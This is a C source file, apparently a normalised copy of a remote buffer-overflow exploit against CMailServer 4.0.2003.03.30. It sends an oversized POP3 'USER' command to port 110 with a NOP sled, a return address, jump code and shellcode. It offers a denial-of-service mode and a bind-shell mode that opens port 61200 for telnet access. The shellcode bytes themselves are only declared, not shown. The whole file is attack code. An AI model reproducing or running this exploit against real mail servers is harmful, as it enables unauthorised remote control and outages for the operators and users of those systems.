
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char s_addr; } ;
struct sockaddr_in {int sin_port; int sin_family; TYPE_1__ sin_addr; } ;
struct sockaddr {int dummy; } ;
struct hostent {char* h_addr; int h_length; } ;
typedef int sock ;
typedef int WSADATA ;
typedef int WORD ;
typedef scalar_t__ SOCKET ;


 int AF_INET ;
 scalar_t__ INVALID_SOCKET ;
 int MAKEWORD (int,int) ;
 int SOCK_STREAM ;
 int Sleep (int) ;
 scalar_t__ WSAStartup (int ,int *) ;
 int closesocket (scalar_t__) ;
 scalar_t__ connect (scalar_t__,struct sockaddr*,int) ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 char* jmpcode ;
 int memcpy (char*,char*,int) ;
 int printf (char*,...) ;
 char* ret_addr ;
 int send (scalar_t__,char*,int,int ) ;
 char* shlcod ;
 scalar_t__ socket (int ,int ,int ) ;
 int strlen (char*) ;
 scalar_t__ strstr (char*,char*) ;

int main(int argc, char *argv[])
{
 WSADATA wsaData;
 WORD wVersionRequested;
 struct hostent *MyTarget;
 struct sockaddr_in sock;
 SOCKET s; int i;
 char *targetip,*typ;
 char buffer[2101];

 printf("\nRemote exploit for CMailServer 4.0.2003.03.30 by m00 security / Over G\n");
 printf("	         www.m00.ru 	  overg[at]mail.ru\n\n");

 if (argc < 3) {
  printf("Usage: %s <victim_host> <type>\n",argv[0]);
  printf("type:\n -d DoS attack\n -s Bind shell on port 61200\n\n");
  return 0;
 }

 targetip = argv[1];
 typ = argv[2];
 for(i = 0; i < 2100; i++) buffer[i] = 0x90;
 memcpy(&buffer[0], "USER ", 5);

 if (strstr(typ,"-s")) {
  memcpy(&buffer[515],ret_addr,strlen(ret_addr));
  memcpy(&buffer[519],jmpcode,strlen(jmpcode));
  memcpy(&buffer[519+strlen(jmpcode)+870],shlcod,strlen(shlcod));
 }

 wVersionRequested = MAKEWORD(1, 1);
 if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

 s = socket(AF_INET, SOCK_STREAM, 0);
 if(s==INVALID_SOCKET)
 {
  printf("Socket error!\r\n");
  exit(1);
 }

 printf("[+] Resolving hostname... ");
 if ((MyTarget = gethostbyname(targetip)) == ((void*)0))
 {
  printf("FAILED :( \n");
  exit(1);
 }

 printf(" OK \n");

 memcpy(&sock.sin_addr.s_addr, MyTarget->h_addr, MyTarget->h_length);
 sock.sin_family = AF_INET;
 sock.sin_port = htons(110);

 printf("[+] Connecting... ");
 if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
 {
  printf(" FAILED :( \n");
  exit(1);
 }
 printf(" OK\n");
 printf("[+] Sending exploit buffer...");
 send(s, buffer, 2100, 0);
 if (send(s, "\r\n", 2, 0) == -1)
 {
  printf(" FAILED :( \n");
  closesocket(s);
  exit(1);
 }
 Sleep(100);
 printf(" OK. \n\n[+] Use telnet for connect to %s:61200\n\n",argv[1]);
 closesocket(s);
return 0;
}
